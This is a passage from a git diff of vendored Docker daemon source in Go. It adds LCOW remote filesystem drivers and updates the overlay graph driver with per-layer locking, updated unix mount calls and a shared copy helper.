stderr io.ReadCloser + fs *lcowfs + guestPath string +} + +func (l *lcowfs) Open(path string) (driver.File, error) { + return l.OpenFile(path, os.O_RDONLY, 0) +} + +func (l *lcowfs) OpenFile(path string, flag int, perm os.FileMode) (_ driver.File, err error) { + flagStr := strconv.FormatInt(int64(flag), 10) + permStr := strconv.FormatUint(uint64(perm), 8) + + commandLine := fmt.Sprintf("%s %s %s %s %s", remotefs.RemotefsCmd, remotefs.OpenFileCmd, path, flagStr, permStr) + env := make(map[string]string) + env["PATH"] = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:" + processConfig := &hcsshim.ProcessConfig{ + EmulateConsole: false, + CreateStdInPipe: true, + CreateStdOutPipe: true, + CreateStdErrPipe: true, + CreateInUtilityVm: true, + WorkingDirectory: "/bin", + Environment: env, + CommandLine: commandLine, + } + + process, err := l.currentSVM.config.Uvm.CreateProcess(processConfig) + if err != nil { + return nil, fmt.Errorf("failed to open file %s: %s", path, err) + } + + stdin, stdout, stderr, err := process.Stdio() + if err != nil { + process.Kill() + process.Close() + return nil, fmt.Errorf("failed to open file pipes %s: %s", path, err) + } + + lf := &lcowfile{ + process: process, + stdin: stdin, + stdout: stdout, + stderr: stderr, + fs: l, + guestPath: path, + } + + if _, err := lf.getResponse(); err != nil { + return nil, fmt.Errorf("failed to open file %s: %s", path, err) + } + return lf, nil +} + +func (l *lcowfile) Read(b []byte) (int, error) { + hdr := &remotefs.FileHeader{ + Cmd: remotefs.Read, + Size: uint64(len(b)), + } + + if err := remotefs.WriteFileHeader(l.stdin, hdr, nil); err != nil { + return 0, err + } + + buf, err := l.getResponse() + if err != nil { + return 0, err + } + + n := copy(b, buf) + return n, nil +} + +func (l *lcowfile) Write(b []byte) (int, error) { + hdr := &remotefs.FileHeader{ + Cmd: remotefs.Write, + Size: uint64(len(b)), + } + + if err := remotefs.WriteFileHeader(l.stdin, hdr, b); err != nil { + return 0, err + } + + _, err := l.getResponse() + if err != nil { + return 0, err + } + + return len(b), nil +} + +func (l *lcowfile) Seek(offset int64, whence int) (int64, error) { + seekHdr := &remotefs.SeekHeader{ + Offset: offset, + Whence: int32(whence), + } + + buf := &bytes.Buffer{} + if err := binary.Write(buf, binary.BigEndian, seekHdr); err != nil { + return 0, err + } + + hdr := &remotefs.FileHeader{ + Cmd: remotefs.Write, + Size: uint64(buf.Len()), + } + if err := remotefs.WriteFileHeader(l.stdin, hdr, buf.Bytes()); err != nil { + return 0, err + } + + resBuf, err := l.getResponse() + if err != nil { + return 0, err + } + + var res int64 + if err := binary.Read(bytes.NewBuffer(resBuf), binary.BigEndian, &res); err != nil { + return 0, err + } + return res, nil +} + +func (l *lcowfile) Close() error { + hdr := &remotefs.FileHeader{ + Cmd: remotefs.Close, + Size: 0, + } + + if err := remotefs.WriteFileHeader(l.stdin, hdr, nil); err != nil { + return err + } + + _, err := l.getResponse() + return err +} + +func (l *lcowfile) Readdir(n int) ([]os.FileInfo, error) { + nStr := strconv.FormatInt(int64(n), 10) + + // Unlike the other File functions, this one can just be run without maintaining state, + // so just do the normal runRemoteFSProcess way. + buf := &bytes.Buffer{} + if err := l.fs.runRemoteFSProcess(nil, buf, remotefs.ReadDirCmd, l.guestPath, nStr); err != nil { + return nil, err + } + + var info []remotefs.FileInfo + if err := json.Unmarshal(buf.Bytes(), &info); err != nil { + return nil, err + } + + osInfo := make([]os.FileInfo, len(info)) + for i := range info { + osInfo[i] = &info[i] + } + return osInfo, nil +} + +func (l *lcowfile) getResponse() ([]byte, error) { + hdr, err := remotefs.ReadFileHeader(l.stdout) + if err != nil { + return nil, err + } + + if hdr.Cmd != remotefs.CmdOK { + // Something went wrong during the openfile in the server. + // Parse stderr and return that as an error + eerr, err := remotefs.ReadError(l.stderr) + if eerr != nil { + return nil, remotefs.ExportedToError(eerr) + } + + // Maybe the parsing went wrong? + if err != nil { + return nil, err + } + + // At this point, we know something went wrong in the remotefs program, but + // we we don't know why. + return nil, fmt.Errorf("unknown error") + } + + // Successful command, we might have some data to read (for Read + Seek) + buf := make([]byte, hdr.Size, hdr.Size) + if _, err := io.ReadFull(l.stdout, buf); err != nil { + return nil, err + } + return buf, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_filedriver.go b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_filedriver.go new file mode 100644 index 0000000000..f335868af6 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_filedriver.go @@ -0,0 +1,123 @@ +// +build windows + +package lcow // import "github.com/docker/docker/daemon/graphdriver/lcow" + +import ( + "bytes" + "encoding/json" + "os" + "strconv" + + "github.com/Microsoft/opengcs/service/gcsutils/remotefs" + + "github.com/containerd/continuity/driver" + "github.com/sirupsen/logrus" +) + +var _ driver.Driver = &lcowfs{} + +func (l *lcowfs) Readlink(p string) (string, error) { + logrus.Debugf("removefs.readlink args: %s", p) + + result := &bytes.Buffer{} + if err := l.runRemoteFSProcess(nil, result, remotefs.ReadlinkCmd, p); err != nil { + return "", err + } + return result.String(), nil +} + +func (l *lcowfs) Mkdir(path string, mode os.FileMode) error { + return l.mkdir(path, mode, remotefs.MkdirCmd) +} + +func (l *lcowfs) MkdirAll(path string, mode os.FileMode) error { + return l.mkdir(path, mode, remotefs.MkdirAllCmd) +} + +func (l *lcowfs) mkdir(path string, mode os.FileMode, cmd string) error { + modeStr := strconv.FormatUint(uint64(mode), 8) + logrus.Debugf("remotefs.%s args: %s %s", cmd, path, modeStr) + return l.runRemoteFSProcess(nil, nil, cmd, path, modeStr) +} + +func (l *lcowfs) Remove(path string) error { + return l.remove(path, remotefs.RemoveCmd) +} + +func (l *lcowfs) RemoveAll(path string) error { + return l.remove(path, remotefs.RemoveAllCmd) +} + +func (l *lcowfs) remove(path string, cmd string) error { + logrus.Debugf("remotefs.%s args: %s", cmd, path) + return l.runRemoteFSProcess(nil, nil, cmd, path) +} + +func (l *lcowfs) Link(oldname, newname string) error { + return l.link(oldname, newname, remotefs.LinkCmd) +} + +func (l *lcowfs) Symlink(oldname, newname string) error { + return l.link(oldname, newname, remotefs.SymlinkCmd) +} + +func (l *lcowfs) link(oldname, newname, cmd string) error { + logrus.Debugf("remotefs.%s args: %s %s", cmd, oldname, newname) + return l.runRemoteFSProcess(nil, nil, cmd, oldname, newname) +} + +func (l *lcowfs) Lchown(name string, uid, gid int64) error { + uidStr := strconv.FormatInt(uid, 10) + gidStr := strconv.FormatInt(gid, 10) + + logrus.Debugf("remotefs.lchown args: %s %s %s", name, uidStr, gidStr) + return l.runRemoteFSProcess(nil, nil, remotefs.LchownCmd, name, uidStr, gidStr) +} + +// Lchmod changes the mode of an file not following symlinks. +func (l *lcowfs) Lchmod(path string, mode os.FileMode) error { + modeStr := strconv.FormatUint(uint64(mode), 8) + logrus.Debugf("remotefs.lchmod args: %s %s", path, modeStr) + return l.runRemoteFSProcess(nil, nil, remotefs.LchmodCmd, path, modeStr) +} + +func (l *lcowfs) Mknod(path string, mode os.FileMode, major, minor int) error { + modeStr := strconv.FormatUint(uint64(mode), 8) + majorStr := strconv.FormatUint(uint64(major), 10) + minorStr := strconv.FormatUint(uint64(minor), 10) + + logrus.Debugf("remotefs.mknod args: %s %s %s %s", path, modeStr, majorStr, minorStr) + return l.runRemoteFSProcess(nil, nil, remotefs.MknodCmd, path, modeStr, majorStr, minorStr) +} + +func (l *lcowfs) Mkfifo(path string, mode os.FileMode) error { + modeStr := strconv.FormatUint(uint64(mode), 8) + logrus.Debugf("remotefs.mkfifo args: %s %s", path, modeStr) + return l.runRemoteFSProcess(nil, nil, remotefs.MkfifoCmd, path, modeStr) +} + +func (l *lcowfs) Stat(p string) (os.FileInfo, error) { + return l.stat(p, remotefs.StatCmd) +} + +func (l *lcowfs) Lstat(p string) (os.FileInfo, error) { + return l.stat(p, remotefs.LstatCmd) +} + +func (l *lcowfs) stat(path string, cmd string) (os.FileInfo, error) { + logrus.Debugf("remotefs.stat inputs: %s %s", cmd, path) + + output := &bytes.Buffer{} + err := l.runRemoteFSProcess(nil, output, cmd, path) + if err != nil { + return nil, err + } + + var fi remotefs.FileInfo + if err := json.Unmarshal(output.Bytes(), &fi); err != nil { + return nil, err + } + + logrus.Debugf("remotefs.stat success. got: %v\n", fi) + return &fi, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_pathdriver.go b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_pathdriver.go new file mode 100644 index 0000000000..74895b0465 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_pathdriver.go @@ -0,0 +1,212 @@ +// +build windows + +package lcow // import "github.com/docker/docker/daemon/graphdriver/lcow" + +import ( + "errors" + "os" + pathpkg "path" + "path/filepath" + "sort" + "strings" + + "github.com/containerd/continuity/pathdriver" +) + +var _ pathdriver.PathDriver = &lcowfs{} + +// Continuity Path functions can be done locally +func (l *lcowfs) Join(path ...string) string { + return pathpkg.Join(path...) +} + +func (l *lcowfs) IsAbs(path string) bool { + return pathpkg.IsAbs(path) +} + +func sameWord(a, b string) bool { + return a == b +} + +// Implementation taken from the Go standard library +func (l *lcowfs) Rel(basepath, targpath string) (string, error) { + baseVol := "" + targVol := "" + base := l.Clean(basepath) + targ := l.Clean(targpath) + if sameWord(targ, base) { + return ".", nil + } + base = base[len(baseVol):] + targ = targ[len(targVol):] + if base == "." { + base = "" + } + // Can't use IsAbs - `\a` and `a` are both relative in Windows. + baseSlashed := len(base) > 0 && base[0] == l.Separator() + targSlashed := len(targ) > 0 && targ[0] == l.Separator() + if baseSlashed != targSlashed || !sameWord(baseVol, targVol) { + return "", errors.New("Rel: can't make " + targpath + " relative to " + basepath) + } + // Position base[b0:bi] and targ[t0:ti] at the first differing elements. + bl := len(base) + tl := len(targ) + var b0, bi, t0, ti int + for { + for bi < bl && base[bi] != l.Separator() { + bi++ + } + for ti < tl && targ[ti] != l.Separator() { + ti++ + } + if !sameWord(targ[t0:ti], base[b0:bi]) { + break + } + if bi < bl { + bi++ + } + if ti < tl { + ti++ + } + b0 = bi + t0 = ti + } + if base[b0:bi] == ".." { + return "", errors.New("Rel: can't make " + targpath + " relative to " + basepath) + } + if b0 != bl { + // Base elements left. Must go up before going down. + seps := strings.Count(base[b0:bl], string(l.Separator())) + size := 2 + seps*3 + if tl != t0 { + size += 1 + tl - t0 + } + buf := make([]byte, size) + n := copy(buf, "..") + for i := 0; i < seps; i++ { + buf[n] = l.Separator() + copy(buf[n+1:], "..") + n += 3 + } + if t0 != tl { + buf[n] = l.Separator() + copy(buf[n+1:], targ[t0:]) + } + return string(buf), nil + } + return targ[t0:], nil +} + +func (l *lcowfs) Base(path string) string { + return pathpkg.Base(path) +} + +func (l *lcowfs) Dir(path string) string { + return pathpkg.Dir(path) +} + +func (l *lcowfs) Clean(path string) string { + return pathpkg.Clean(path) +} + +func (l *lcowfs) Split(path string) (dir, file string) { + return pathpkg.Split(path) +} + +func (l *lcowfs) Separator() byte { + return '/' +} + +func (l *lcowfs) Abs(path string) (string, error) { + // Abs is supposed to add the current working directory, which is meaningless in lcow. + // So, return an error. + return "", ErrNotSupported +} + +// Implementation taken from the Go standard library +func (l *lcowfs) Walk(root string, walkFn filepath.WalkFunc) error { + info, err := l.Lstat(root) + if err != nil { + err = walkFn(root, nil, err) + } else { + err = l.walk(root, info, walkFn) + } + if err == filepath.SkipDir { + return nil + } + return err +} + +// walk recursively descends path, calling w. +func (l *lcowfs) walk(path string, info os.FileInfo, walkFn filepath.WalkFunc) error { + err := walkFn(path, info, nil) + if err != nil { + if info.IsDir() && err == filepath.SkipDir { + return nil + } + return err + } + + if !info.IsDir() { + return nil + } + + names, err := l.readDirNames(path) + if err != nil { + return walkFn(path, info, err) + } + + for _, name := range names { + filename := l.Join(path, name) + fileInfo, err := l.Lstat(filename) + if err != nil { + if err := walkFn(filename, fileInfo, err); err != nil && err != filepath.SkipDir { + return err + } + } else { + err = l.walk(filename, fileInfo, walkFn) + if err != nil { + if !fileInfo.IsDir() || err != filepath.SkipDir { + return err + } + } + } + } + return nil +} + +// readDirNames reads the directory named by dirname and returns +// a sorted list of directory entries. +func (l *lcowfs) readDirNames(dirname string) ([]string, error) { + f, err := l.Open(dirname) + if err != nil { + return nil, err + } + files, err := f.Readdir(-1) + f.Close() + if err != nil { + return nil, err + } + + names := make([]string, len(files), len(files)) + for i := range files { + names[i] = files[i].Name() + } + + sort.Strings(names) + return names, nil +} + +// Note that Go's filepath.FromSlash/ToSlash convert between OS paths and '/'. Since the path separator +// for LCOW (and Unix) is '/', they are no-ops. +func (l *lcowfs) FromSlash(path string) string { + return path +} + +func (l *lcowfs) ToSlash(path string) string { + return path +} + +func (l *lcowfs) Match(pattern, name string) (matched bool, err error) { + return pathpkg.Match(pattern, name) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go deleted file mode 100644 index 666a5c0e04..0000000000 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go +++ /dev/null @@ -1,174 +0,0 @@ -// +build linux - -package overlay - -import ( - "fmt" - "os" - "path/filepath" - "syscall" - "time" - - "github.com/docker/docker/pkg/pools" - "github.com/docker/docker/pkg/system" - rsystem "github.com/opencontainers/runc/libcontainer/system" -) - -type copyFlags int - -const ( - copyHardlink copyFlags = 1 << iota -) - -func copyRegular(srcPath, dstPath string, mode os.FileMode) error { - srcFile, err := os.Open(srcPath) - if err != nil { - return err - } - defer srcFile.Close() - - dstFile, err := os.OpenFile(dstPath, os.O_WRONLY|os.O_CREATE, mode) - if err != nil { - return err - } - defer dstFile.Close() - - _, err = pools.Copy(dstFile, srcFile) - - return err -} - -func copyXattr(srcPath, dstPath, attr string) error { - data, err := system.Lgetxattr(srcPath, attr) - if err != nil { - return err - } - if data != nil { - if err := system.Lsetxattr(dstPath, attr, data, 0); err != nil { - return err - } - } - return nil -} - -func copyDir(srcDir, dstDir string, flags copyFlags) error { - err := filepath.Walk(srcDir, func(srcPath string, f os.FileInfo, err error) error { - if err != nil { - return err - } - - // Rebase path - relPath, err := filepath.Rel(srcDir, srcPath) - if err != nil { - return err - } - - dstPath := filepath.Join(dstDir, relPath) - if err != nil { - return err - } - - stat, ok := f.Sys().(*syscall.Stat_t) - if !ok { - return fmt.Errorf("Unable to get raw syscall.Stat_t data for %s", srcPath) - } - - isHardlink := false - - switch f.Mode() & os.ModeType { - case 0: // Regular file - if flags©Hardlink != 0 { - isHardlink = true - if err := os.Link(srcPath, dstPath); err != nil { - return err - } - } else { - if err := copyRegular(srcPath, dstPath, f.Mode()); err != nil { - return err - } - } - - case os.ModeDir: - if err := os.Mkdir(dstPath, f.Mode()); err != nil && !os.IsExist(err) { - return err - } - - case os.ModeSymlink: - link, err := os.Readlink(srcPath) - if err != nil { - return err - } - - if err := os.Symlink(link, dstPath); err != nil { - return err - } - - case os.ModeNamedPipe: - fallthrough - case os.ModeSocket: - if rsystem.RunningInUserNS() { - // cannot create a device if running in user namespace - return nil - } - if err := syscall.Mkfifo(dstPath, stat.Mode); err != nil { - return err - } - - case os.ModeDevice: - if err := syscall.Mknod(dstPath, stat.Mode, int(stat.Rdev)); err != nil { - return err - } - - default: - return fmt.Errorf("Unknown file type for %s\n", srcPath) - } - - // Everything below is copying metadata from src to dst. All this metadata - // already shares an inode for hardlinks. - if isHardlink { - return nil - } - - if err := os.Lchown(dstPath, int(stat.Uid), int(stat.Gid)); err != nil { - return err - } - - if err := copyXattr(srcPath, dstPath, "security.capability"); err != nil { - return err - } - - // We need to copy this attribute if it appears in an overlay upper layer, as - // this function is used to copy those. It is set by overlay if a directory - // is removed and then re-created and should not inherit anything from the - // same dir in the lower dir. - if err := copyXattr(srcPath, dstPath, "trusted.overlay.opaque"); err != nil { - return err - } - - isSymlink := f.Mode()&os.ModeSymlink != 0 - - // There is no LChmod, so ignore mode for symlink. Also, this - // must happen after chown, as that can modify the file mode - if !isSymlink { - if err := os.Chmod(dstPath, f.Mode()); err != nil { - return err - } - } - - // system.Chtimes doesn't support a NOFOLLOW flag atm - if !isSymlink { - aTime := time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec)) - mTime := time.Unix(int64(stat.Mtim.Sec), int64(stat.Mtim.Nsec)) - if err := system.Chtimes(dstPath, aTime, mTime); err != nil { - return err - } - } else { - ts := []syscall.Timespec{stat.Atim, stat.Mtim} - if err := system.LUtimesNano(dstPath, ts); err != nil { - return err - } - } - return nil - }) - return err -} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go index 121b72e2c3..0c2167f083 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go @@ -1,6 +1,6 @@ // +build linux -package overlay +package overlay // import "github.com/docker/docker/daemon/graphdriver/overlay" import ( "bufio" @@ -10,17 +10,24 @@ import ( "os" "os/exec" "path" + "path/filepath" "strconv" - "syscall" + "strings" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/daemon/graphdriver/copy" "github.com/docker/docker/daemon/graphdriver/overlayutils" "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/fsutils" "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/locker" "github.com/docker/docker/pkg/mount" - "github.com/opencontainers/runc/libcontainer/label" + "github.com/docker/docker/pkg/parsers" + "github.com/docker/docker/pkg/system" + "github.com/opencontainers/selinux/go-selinux/label" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) // This is a small wrapper over the NaiveDiffWriter that lets us have a custom @@ -90,6 +97,8 @@ func (d *naiveDiffDriverWithApply) ApplyDiff(id, parent string, diff io.Reader) // of that. This means all child images share file (but not directory) // data with the parent. +type overlayOptions struct{} + // Driver contains information about the home directory and the list of active mounts that are created using this driver. type Driver struct { home string @@ -97,6 +106,7 @@ type Driver struct { gidMaps []idtools.IDMap ctr *graphdriver.RefCounter supportsDType bool + locker *locker.Locker } func init() { @@ -104,15 +114,30 @@ func init() { } // Init returns the NaiveDiffDriver, a native diff driver for overlay filesystem. -// If overlay filesystem is not supported on the host, graphdriver.ErrNotSupported is returned as error. -// If an overlay filesystem is not supported over an existing filesystem then error graphdriver.ErrIncompatibleFS is returned. +// If overlay filesystem is not supported on the host, the error +// graphdriver.ErrNotSupported is returned. +// If an overlay filesystem is not supported over an existing filesystem then +// error graphdriver.ErrIncompatibleFS is returned. func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { + _, err := parseOptions(options) + if err != nil { + return nil, err + } if err := supportsOverlay(); err != nil { return nil, graphdriver.ErrNotSupported } - fsMagic, err := graphdriver.GetFSMagic(home) + // Perform feature detection on /var/lib/docker/overlay if it's an existing directory. + // This covers situations where /var/lib/docker/overlay is a mount, and on a different + // filesystem than /var/lib/docker. + // If the path does not exist, fall back to using /var/lib/docker for feature detection. + testdir := home + if _, err := os.Stat(testdir); os.IsNotExist(err) { + testdir = filepath.Dir(testdir) + } + + fsMagic, err := graphdriver.GetFSMagic(testdir) if err != nil { return nil, err } @@ -121,31 +146,30 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap } switch fsMagic { - case graphdriver.FsMagicAufs, graphdriver.FsMagicBtrfs, graphdriver.FsMagicOverlay, graphdriver.FsMagicZfs, graphdriver.FsMagicEcryptfs: - logrus.Errorf("'overlay' is not supported over %s", backingFs) + case graphdriver.FsMagicAufs, graphdriver.FsMagicBtrfs, graphdriver.FsMagicEcryptfs, graphdriver.FsMagicNfsFs, graphdriver.FsMagicOverlay, graphdriver.FsMagicZfs: + logrus.WithField("storage-driver", "overlay").Errorf("'overlay' is not supported over %s", backingFs) return nil, graphdriver.ErrIncompatibleFS } - rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) + supportsDType, err := fsutils.SupportsDType(testdir) if err != nil { return nil, err } - // Create the driver home dir - if err := idtools.MkdirAllAs(home, 0700, rootUID, rootGID); err != nil && !os.IsExist(err) { - return nil, err - } - - if err := mount.MakePrivate(home); err != nil { - return nil, err + if !supportsDType { + if !graphdriver.IsInitialized(home) { + return nil, overlayutils.ErrDTypeNotSupported("overlay", backingFs) + } + // allow running without d_type only for existing setups (#27443) + logrus.WithField("storage-driver", "overlay").Warn(overlayutils.ErrDTypeNotSupported("overlay", backingFs)) } - supportsDType, err := fsutils.SupportsDType(home) + rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) if err != nil { return nil, err } - if !supportsDType { - // not a fatal error until v1.16 (#27443) - logrus.Warn(overlayutils.ErrDTypeNotSupported("overlay", backingFs)) + // Create the driver home dir + if err := idtools.MkdirAllAndChown(home, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { + return nil, err } d := &Driver{ @@ -154,11 +178,28 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap gidMaps: gidMaps, ctr: graphdriver.NewRefCounter(graphdriver.NewFsChecker(graphdriver.FsMagicOverlay)), supportsDType: supportsDType, + locker: locker.New(), } return NaiveDiffDriverWithApply(d, uidMaps, gidMaps), nil } +func parseOptions(options []string) (*overlayOptions, error) { + o := &overlayOptions{} + for _, option := range options { + key, _, err := parsers.ParseKeyValueOpt(option) + if err != nil { + return nil, err + } + key = strings.ToLower(key) + switch key { + default: + return nil, fmt.Errorf("overlay: unknown option %s", key) + } + } + return o, nil +} + func supportsOverlay() error { // We can try to modprobe overlay first before looking at // proc/filesystems for when overlay is supported @@ -176,7 +217,7 @@ func supportsOverlay() error { return nil } } - logrus.Error("'overlay' not found as a supported filesystem on this host. Please ensure kernel is new enough and has overlay support loaded.") + logrus.WithField("storage-driver", "overlay").Error("'overlay' not found as a supported filesystem on this host. Please ensure kernel is new enough and has overlay support loaded.") return graphdriver.ErrNotSupported } @@ -193,7 +234,8 @@ func (d *Driver) Status() [][2]string { } } -// GetMetadata returns meta data about the overlay driver such as root, LowerDir, UpperDir, WorkDir and MergeDir used to store data. +// GetMetadata returns metadata about the overlay driver such as root, +// LowerDir, UpperDir, WorkDir and MergeDir used to store data. func (d *Driver) GetMetadata(id string) (map[string]string, error) { dir := d.dir(id) if _, err := os.Stat(dir); err != nil { @@ -226,7 +268,7 @@ func (d *Driver) GetMetadata(id string) (map[string]string, error) { // is being shutdown. For now, we just have to unmount the bind mounted // we had created. func (d *Driver) Cleanup() error { - return mount.Unmount(d.home) + return mount.RecursiveUnmount(d.home) } // CreateReadWrite creates a layer that is writable for use as a container @@ -249,10 +291,12 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr if err != nil { return err } - if err := idtools.MkdirAllAs(path.Dir(dir), 0700, rootUID, rootGID); err != nil { + root := idtools.IDPair{UID: rootUID, GID: rootGID} + + if err := idtools.MkdirAllAndChown(path.Dir(dir), 0700, root); err != nil { return err } - if err := idtools.MkdirAs(dir, 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAndChown(dir, 0700, root); err != nil { return err } @@ -265,10 +309,7 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr // Toplevel images are just a "root" dir if parent == "" { - if err := idtools.MkdirAs(path.Join(dir, "root"), 0755, rootUID, rootGID); err != nil { - return err - } - return nil + return idtools.MkdirAndChown(path.Join(dir, "root"), 0755, root) } parentDir := d.dir(parent) @@ -282,19 +323,13 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr parentRoot := path.Join(parentDir, "root") if s, err := os.Lstat(parentRoot); err == nil { - if err := idtools.MkdirAs(path.Join(dir, "upper"), s.Mode(), rootUID, rootGID); err != nil { - return err - } - if err := idtools.MkdirAs(path.Join(dir, "work"), 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAndChown(path.Join(dir, "upper"), s.Mode(), root); err != nil { return err } - if err := idtools.MkdirAs(path.Join(dir, "merged"), 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAndChown(path.Join(dir, "work"), 0700, root); err != nil { return err } - if err := ioutil.WriteFile(path.Join(dir, "lower-id"), []byte(parent), 0666); err != nil { - return err - } - return nil + return ioutil.WriteFile(path.Join(dir, "lower-id"), []byte(parent), 0666) } // Otherwise, copy the upper and the lower-id from the parent @@ -315,17 +350,14 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr } upperDir := path.Join(dir, "upper") - if err := idtools.MkdirAs(upperDir, s.Mode(), rootUID, rootGID); err != nil { + if err := idtools.MkdirAndChown(upperDir, s.Mode(), root); err != nil { return err } - if err := idtools.MkdirAs(path.Join(dir, "work"), 0700, rootUID, rootGID); err != nil { - return err - } - if err := idtools.MkdirAs(path.Join(dir, "merged"), 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAndChown(path.Join(dir, "work"), 0700, root); err != nil { return err } - return copyDir(parentUpperDir, upperDir, 0) + return copy.DirCopy(parentUpperDir, upperDir, copy.Content, true) } func (d *Driver) dir(id string) string { @@ -334,37 +366,55 @@ func (d *Driver) dir(id string) string { // Remove cleans the directories that are created for this id. func (d *Driver) Remove(id string) error { - if err := os.RemoveAll(d.dir(id)); err != nil && !os.IsNotExist(err) { - return err + if id == "" { + return fmt.Errorf("refusing to remove the directories: id is empty") } - return nil + d.locker.Lock(id) + defer d.locker.Unlock(id) + return system.EnsureRemoveAll(d.dir(id)) } // Get creates and mounts the required file system for the given id and returns the mount path. -func (d *Driver) Get(id string, mountLabel string) (s string, err error) { +func (d *Driver) Get(id, mountLabel string) (_ containerfs.ContainerFS, err error) { + d.locker.Lock(id) + defer d.locker.Unlock(id) dir := d.dir(id) if _, err := os.Stat(dir); err != nil { - return "", err + return nil, err } // If id has a root, just return it rootDir := path.Join(dir, "root") if _, err := os.Stat(rootDir); err == nil { - return rootDir, nil + return containerfs.NewLocalContainerFS(rootDir), nil } + mergedDir := path.Join(dir, "merged") if count := d.ctr.Increment(mergedDir); count > 1 { - return mergedDir, nil + return containerfs.NewLocalContainerFS(mergedDir), nil } defer func() { if err != nil { if c := d.ctr.Decrement(mergedDir); c <= 0 { - syscall.Unmount(mergedDir, 0) + if mntErr := unix.Unmount(mergedDir, 0); mntErr != nil { + logrus.WithField("storage-driver", "overlay").Debugf("Failed to unmount %s: %v: %v", id, mntErr, err) + } + // Cleanup the created merged directory; see the comment in Put's rmdir + if rmErr := unix.Rmdir(mergedDir); rmErr != nil && !os.IsNotExist(rmErr) { + logrus.WithField("storage-driver", "overlay").Warnf("Failed to remove %s: %v: %v", id, rmErr, err) + } } } }() lowerID, err := ioutil.ReadFile(path.Join(dir, "lower-id")) if err != nil { - return "", err + return nil, err + } + rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) + if err != nil { + return nil, err + } + if err := idtools.MkdirAndChown(mergedDir, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { + return nil, err } var ( lowerDir = path.Join(d.dir(string(lowerID)), "root") @@ -372,33 +422,45 @@ func (d *Driver) Get(id string, mountLabel string) (s string, err error) { workDir = path.Join(dir, "work") opts = fmt.Sprintf("lowerdir=%s,upperdir=%s,workdir=%s", lowerDir, upperDir, workDir) ) - if err := syscall.Mount("overlay", mergedDir, "overlay", 0, label.FormatMountLabel(opts, mountLabel)); err != nil { - return "", fmt.Errorf("error creating overlay mount to %s: %v", mergedDir, err) + if err := unix.Mount("overlay", mergedDir, "overlay", 0, label.FormatMountLabel(opts, mountLabel)); err != nil { + return nil, fmt.Errorf("error creating overlay mount to %s: %v", mergedDir, err) } // chown "workdir/work" to the remapped root UID/GID. Overlay fs inside a // user namespace requires this to move a directory from lower to upper. - rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) - if err != nil { - return "", err - } if err := os.Chown(path.Join(workDir, "work"), rootUID, rootGID); err != nil { - return "", err + return nil, err } - return mergedDir, nil + return containerfs.NewLocalContainerFS(mergedDir), nil } // Put unmounts the mount path created for the give id. +// It also removes the 'merged' directory to force the kernel to unmount the +// overlay mount in other namespaces. func (d *Driver) Put(id string) error { + d.locker.Lock(id) + defer d.locker.Unlock(id) // If id has a root, just return if _, err := os.Stat(path.Join(d.dir(id), "root")); err == nil { return nil } mountpoint := path.Join(d.dir(id), "merged") + logger := logrus.WithField("storage-driver", "overlay") if count := d.ctr.Decrement(mountpoint); count > 0 { return nil } - if err := syscall.Unmount(mountpoint, 0); err != nil { - logrus.Debugf("Failed to unmount %s overlay: %v", id, err) + if err := unix.Unmount(mountpoint, unix.MNT_DETACH); err != nil { + logger.Debugf("Failed to unmount %s overlay: %v", id, err) + } + + // Remove the mountpoint here. Removing the mountpoint (in newer kernels) + // will cause all other instances of this mount in other mount namespaces + // to be unmounted. This is necessary to avoid cases where an overlay mount + // that is present in another namespace will cause subsequent mounts + // operations to fail with ebusy. We ignore any errors here because this may + // fail on older kernels which don't have + // torvalds/linux@8ed936b5671bfb33d89bc60bdcc7cf0470ba52fe applied. + if err := unix.Rmdir(mountpoint); err != nil { + logger.Debugf("Failed to remove %s overlay: %v", id, err) } return nil } @@ -438,7 +500,7 @@ func (d *Driver) ApplyDiff(id string, parent string, diff io.Reader) (size int64 } }() - if err = copyDir(parentRootDir, tmpRootDir, copyHardlink); err != nil { + if err = copy.DirCopy(parentRootDir, tmpRootDir, copy.Hardlink, true); err != nil { return 0, err } diff --git 